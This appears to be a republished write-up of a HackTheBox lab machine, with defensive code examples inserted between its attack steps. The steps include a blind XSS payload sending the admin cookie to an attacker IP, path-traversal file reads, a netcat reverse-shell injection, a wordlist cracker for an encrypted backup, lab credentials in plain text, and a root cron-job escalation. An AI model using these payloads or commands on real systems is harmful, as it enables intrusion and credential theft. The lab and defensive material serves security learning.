Imagery HTB WriteUp: Season 9 Machine 2
The article describes a penetration test: after discovering the target's services with an Nmap scan, a client-side restriction bypass and a blind XSS vulnerability are used to gain access to the admin panel, and user credentials are extracted from a configuration file through an LFI vulnerability. An RCE vulnerability then yields a system shell, and privilege escalation finally gives root access and the flag. 2025-10-9 09:6:6 Author: infosecwriteups.com Reads: 190

Abhishek Gupta

This is not a proper walkthrough; it is just a writeup, or you could say some personal notes I made while solving the machine.

Initial Recon

Nmap

nmap 10.10.11.88 -p8000,8001,22 -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 01:04 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 01:04 (0:00:00 remaining)
Nmap scan report for 10.10.11.88
Host is up (0.12s latency).
PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
8000/tcp open   http        Werkzeug httpd 3.1.3 (Python 3.12.7)
8001/tcp closed vcom-tunnel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds

I bypassed the client-side restriction with a Burp match-and-replace rule that turns "isAdmin":false into "isAdmin":true. That let me see the admin panel interface, but not perform any action.
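The reason a match-and-replace on the response works is that the page's "isAdmin" flag is only enforced in the browser. As an added example that is not part of the original writeup or the target application, the following shows the two ways a Werkzeug/Flask-style backend could decide an admin action: trusting the flag the client sends (the pattern the bypass defeats) versus looking the role up in a server-side session store. The session store, tokens and account names are constructed for the example.

```python
import hmac

# Constructed server-side session store: token -> account record.
# In a real app this would be a database or server-side session backend.
SESSIONS = {
    "tok-admin-0001": {"username": "admin@example.invalid", "isAdmin": True},
    "tok-user-0002": {"username": "testuser@example.invalid", "isAdmin": False},
}


def lookup_session(token):
    """Return the server-held account for a session token, or None."""
    if not token:
        return None
    for stored, account in SESSIONS.items():
        # Constant-time comparison so token prefixes cannot be guessed via timing.
        if hmac.compare_digest(stored, token):
            return account
    return None


def vulnerable_is_admin(request_json):
    """Trusts the client's own claim: exactly what a match-and-replace rule flips."""
    return bool(request_json.get("isAdmin", False))


def admin_action_allowed(session_token, request_json):
    """Hardened check: the role comes from the server-side session, never from the body."""
    account = lookup_session(session_token)
    if account is None:
        return False
    # request_json is deliberately ignored for the authorization decision.
    return account["isAdmin"] is True


def handle_admin_request(session_token, request_json):
    """Return (status_code, message) the way a Flask view would."""
    if not admin_action_allowed(session_token, request_json):
        return 403, "forbidden"
    return 200, "ok"
```

With the hardened check, editing the JSON in the browser changes nothing: a non-admin session still gets 403, and the client-side flag is only a UI hint.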

I discovered a /report_bug endpoint in the client-side source code. You can use various endpoint extractor tools, but I did it manually.

Blind XSS to Admin Account

Payload: <img src=x onerror=fetch('http://10.10.16.45/?cookie='+document.cookie)>

{"bugName":"hello","bugDetails":"<img src=x onerror=fetch('http://10.10.16.45/?cookie='+document.cookie)>"}
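Two defensive properties would have stopped this payload: escaping user-supplied report text when the admin panel renders it, and marking the session cookie HttpOnly so document.cookie cannot read it. The example below is added here and is not code from the original writeup or the target; it renders a constructed bug report (the attacker host is replaced by a placeholder) both unsafely and safely, and builds a hardened Set-Cookie header with the standard library.

```python
import html
from http.cookies import SimpleCookie

# Constructed bug report shaped like the one submitted above; host is a placeholder.
REPORT = {
    "bugName": "hello",
    "bugDetails": "<img src=x onerror=fetch('http://attacker.invalid/?cookie='+document.cookie)>",
}


def render_report_vulnerable(report):
    """Interpolates stored text straight into HTML: the admin's browser executes it."""
    return f"<h2>{report['bugName']}</h2><p>{report['bugDetails']}</p>"


def render_report_safe(report):
    """Escapes every user-controlled field at output time (quote=True also covers ' and \")."""
    name = html.escape(report["bugName"], quote=True)
    details = html.escape(report["bugDetails"], quote=True)
    return f"<h2>{name}</h2><p>{details}</p>"


def contains_img_tag(rendered):
    """True if an <img ...> element survives in the rendered HTML."""
    return "<img" in rendered


def session_cookie_header(token):
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
    Secure limits it to TLS, SameSite=Lax blunts cross-site requests."""
    c = SimpleCookie()
    c["session"] = token
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c["session"].OutputString()
```

Escaping at output is the fix for the stored XSS itself; HttpOnly is defence in depth, since a script running in the admin's origin could still call admin endpoints directly even without reading the cookie.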


Found some users with an admin token


Admin Panel


Clicked Download Log to get the password of testuser, but got an error.


LFI

  • A potential LFI parameter here

  • Tried SSRF here too, but it didn't work
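The log-download parameter is an LFI because the server joins whatever it receives onto a directory path. As an added example (not the writeup's or the target's code), here is the containment check a log-download handler should do: resolve the requested name under the log directory, canonicalise it, and refuse anything whose real path leaves that directory. The directory layout is constructed in a temporary folder so the comparison between the vulnerable and safe readers can be run offline.

```python
import os
import tempfile


def resolve_log_path(base_dir, requested):
    """Absolute path of `requested` inside base_dir, or None if it escapes.

    The check runs on the canonical (symlink-resolved) path, so '../',
    absolute paths and symlinks pointing outside base_dir are all refused.
    """
    base = os.path.realpath(base_dir)
    try:
        candidate = os.path.realpath(os.path.join(base, requested))
        # commonpath raises ValueError for mixed absolute/relative inputs.
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:
        return None
    return candidate


def read_log_vulnerable(base_dir, requested):
    """Concatenates the parameter straight into the path: the classic LFI shape."""
    with open(os.path.join(base_dir, requested), "rb") as f:
        return f.read()


def read_log_safe(base_dir, requested):
    """Returns file bytes only for regular files confined to base_dir."""
    path = resolve_log_path(base_dir, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Builds a constructed log directory and reports what each reader returns."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "logs")
    os.makedirs(logs)
    with open(os.path.join(logs, "app.log"), "wb") as f:
        f.write(b"login ok\n")
    with open(os.path.join(root, "secret.txt"), "wb") as f:
        f.write(b"outside\n")
    return {
        "legit": read_log_safe(logs, "app.log"),
        "traversal": read_log_safe(logs, "../secret.txt"),
        "absolute": read_log_safe(logs, "/etc/hostname"),
        "vulnerable_traversal": read_log_vulnerable(logs, "../secret.txt"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Note that os.path.join discards the base when the second argument is absolute, which is why the safe reader must compare canonical paths rather than merely rejecting "..".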


INFO FROM LFI

  • Two users: mark and web

  • Got the location where the web app is hosted

  • Dumped the ENV variables and the current user

  • Credentials of the admin and test user found in db.json via config.py, which is the common config file alongside app.py in Python servers.


{
"username": "[email protected]",
"password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
"isAdmin": true,
"displayId": "a1b2c3d4",
"login_attempts": 0,
"isTestuser": false,
"failed_login_attempts": 0,
"locked_until": null
}
{
"username": "[email protected]",
"password": "2c65c8d7bfbca32a3ed42596192384f6",
"isAdmin": false,
"displayId": "e5f6g7h8",
"login_attempts": 0,
"isTestuser": true,
"failed_login_attempts": 0,
"locked_until": null
}
  • Cracked the test user password


RCE on Apply Visual Transform from the test user


Gain the shell

On the target: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.45 8888 >/tmp/f;

On our system: rlwrap -f . -r nc -nvlp 8888

Got a pty shell: python -c 'import pty;pty.spawn("/bin/bash")'
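The leading ";" in the payload above only works because the transform feature hands user input to a shell. As an added example, not taken from the writeup or the target application, this shows the hardened shape of such a feature: an allowlist for the transform name, strict patterns for the file name and numeric argument, and an argv list passed to subprocess with shell=False. The tool name "convert" and the parameter layout are assumptions; the runner is injectable so the test never executes anything.

```python
import re
import shlex
import subprocess

ALLOWED_TRANSFORMS = {"rotate", "resize", "flip", "crop"}
# Numeric argument such as "90" or "800x600"; nothing else gets through.
ARG_RE = re.compile(r"^[0-9]{1,5}(x[0-9]{1,5})?$")
# Stored image names are plain file names, never paths.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def build_shell_command_vulnerable(image, transform, arg):
    """String destined for os.system()/shell=True: ';' and '|' start new commands."""
    return f"convert {image} -{transform} {arg} out.png"


def shell_tokens(command):
    """Tokenise the way a shell would, so ';' shows up as its own token."""
    lexer = shlex.shlex(command, punctuation_chars=True)
    return list(lexer)


def build_argv_safe(image, transform, arg):
    """Validate every field and return an argv list, or None to answer 400."""
    if transform not in ALLOWED_TRANSFORMS:
        return None
    if image in (".", "..") or not NAME_RE.match(image):
        return None
    if not ARG_RE.match(arg):
        return None
    # 'convert' is a hypothetical converter standing in for whatever the app wraps.
    return ["convert", image, f"-{transform}", arg, "out.png"]


def run_transform(image, transform, arg, runner=subprocess.run):
    """Execute the validated argv without a shell; `runner` is injectable for tests."""
    argv = build_argv_safe(image, transform, arg)
    if argv is None:
        return {"status": 400, "argv": None}
    runner(argv, shell=False, check=False)
    return {"status": 200, "argv": argv}
```

Even with shell=False, the allowlist matters: an argument beginning with "-" could otherwise be interpreted as an option by the converter, which is why the file-name pattern excludes a leading dash only by virtue of the name having to be a real image name in practice and why the transform name is chosen from a fixed set rather than passed through.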

PrivEsc To Mark

Got some info on the Machine

  • Admin user password

CHROME_BINARY = "/usr/bin/google-chrome"
USERNAME = "[email protected]"
PASSWORD = "strongsandofbeach"
BYPASS_TOKEN = "K7Zg9vB$24NmW!q8xR0p%tL!"
APP_URL = "http://0.0.0.0:8000"
  • I found this backup file, but it was encrypted, so I asked ChatGPT to help me crack this, and it gave me a script
  1. python3 -m venv temp
  2. source temp/bin/activate
  3. pip install pyAesCrypt
  4. python crack.py web_20250806_120723.zip.aes /usr/share/wordlists/rockyou.txt
#!/usr/bin/env python3
# Wordlist attack against an AES Crypt (.aes) container using pyAesCrypt.
import pyAesCrypt
import sys
import os

if len(sys.argv) < 3:
    print("Usage: python crack.py file.zip.aes wordlist.txt [outdir]")
    sys.exit(1)

encfile = sys.argv[1]
wordlist = sys.argv[2]
outdir = sys.argv[3] if len(sys.argv) > 3 else "attempt_out"
os.makedirs(outdir, exist_ok=True)

# chunk size used by pyAesCrypt (default value).
bufferSize = 64 * 1024

total = 0
with open(wordlist, "r", errors="ignore") as f:
    for line in f:
        pwd = line.rstrip("\n\r")
        if not pwd:
            continue
        total += 1
        if total % 1000 == 0:
            print(f"Attempt #{total}: '{pwd[:30]}'")
        outpath = os.path.join(outdir, "temp_decrypted_output")
        try:
            # pyAesCrypt.decryptFile raises ValueError on a wrong password
            # (or on a corrupted/truncated container).
            pyAesCrypt.decryptFile(encfile, outpath, pwd, bufferSize)
            print()
            print("Password Cracked")
            print(pwd)
            print("Decrypted output saved to:", outpath)
            sys.exit(0)
        except Exception:
            # Wrong password: remove any partially written output file and keep going.
            if os.path.exists(outpath):
                try:
                    os.remove(outpath)
                except OSError:
                    pass
            continue

print("Password NOT found in the provided wordlist.")
sys.exit(2)


  5. unzip attempt_out/temp_decrypted_output
  6. cat web/db.json
  • We got the password for Mark here
  7. su mark and enter the password supersmash when prompted

PrivEsc to Root

  • Found a binary that Mark can run with sudo without a password


  • It was a custom binary that could set cron jobs, so I set a cron job as root
  1. sudo charcol shell
  2. auto add --schedule "* * * * *" --command "cat /root/root.txt > /home/.flag2" --name "root_flag" --log-output /home/.flag
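From the defender's side, both halves of this escalation are visible on disk: a NOPASSWD sudoers rule for a user-facing binary, and a cron entry that reads from /root and drops its output in an odd place every minute. The script below is an added auditing example, not part of the writeup or of the charcol tool; it parses constructed sudoers-style and crontab text, flags NOPASSWD rules, and flags cron commands shaped like the one created above. The path /usr/local/bin/charcol is an assumption, since the writeup only shows the command name.

```python
import re

# Constructed sudoers fragment; the charcol path is an assumption for the example.
SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mark    ALL=(ALL) NOPASSWD: /usr/local/bin/charcol
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart web
"""

# Constructed crontab, modelled on the entry the writeup schedules.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * cat /root/root.txt > /home/.flag2
"""

SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)


def find_nopasswd_rules(text):
    """Return (user, runas, command) for every NOPASSWD rule in sudoers-style text."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if m and "NOPASSWD" in m.group("tags"):
            findings.append((m.group("who"), m.group("runas"), m.group("cmd").strip()))
    return findings


CRON_RE = re.compile(r"^(\S+\s+){5}(?P<cmd>.+)$")


def suspicious_cron_entries(text):
    """Flag cron commands that read /root, write hidden files under /home, or run every minute."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        reasons = []
        if "/root/" in cmd:
            reasons.append("reads from /root")
        if re.search(r">\s*/home/\.", cmd):
            reasons.append("writes a hidden file under /home")
        if line.startswith("* * * * *"):
            reasons.append("runs every minute")
        if reasons:
            hits.append((cmd, reasons))
    return hits


if __name__ == "__main__":
    for rule in find_nopasswd_rules(SUDOERS):
        print("NOPASSWD:", rule)
    for cmd, why in suspicious_cron_entries(CRONTAB):
        print("cron:", cmd, "->", ", ".join(why))
```

In a real deployment the same checks would read /etc/sudoers and /etc/sudoers.d/* (via visudo -c or sudo -l output) and the system and per-user crontabs; the lesson from the box is that any NOPASSWD binary that can write cron entries is root, whatever its name suggests.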


WE GOT THE FLAGS !!!

Connect with me on LinkedIn; maybe we will solve a machine together: https://www.linkedin.com/in/abhishek26gupta/


Article source: https://infosecwriteups.com/imagery-htb-writeup-season-9-machine-2-6e09f640a993?source=rss----7b722bfd1b8d---4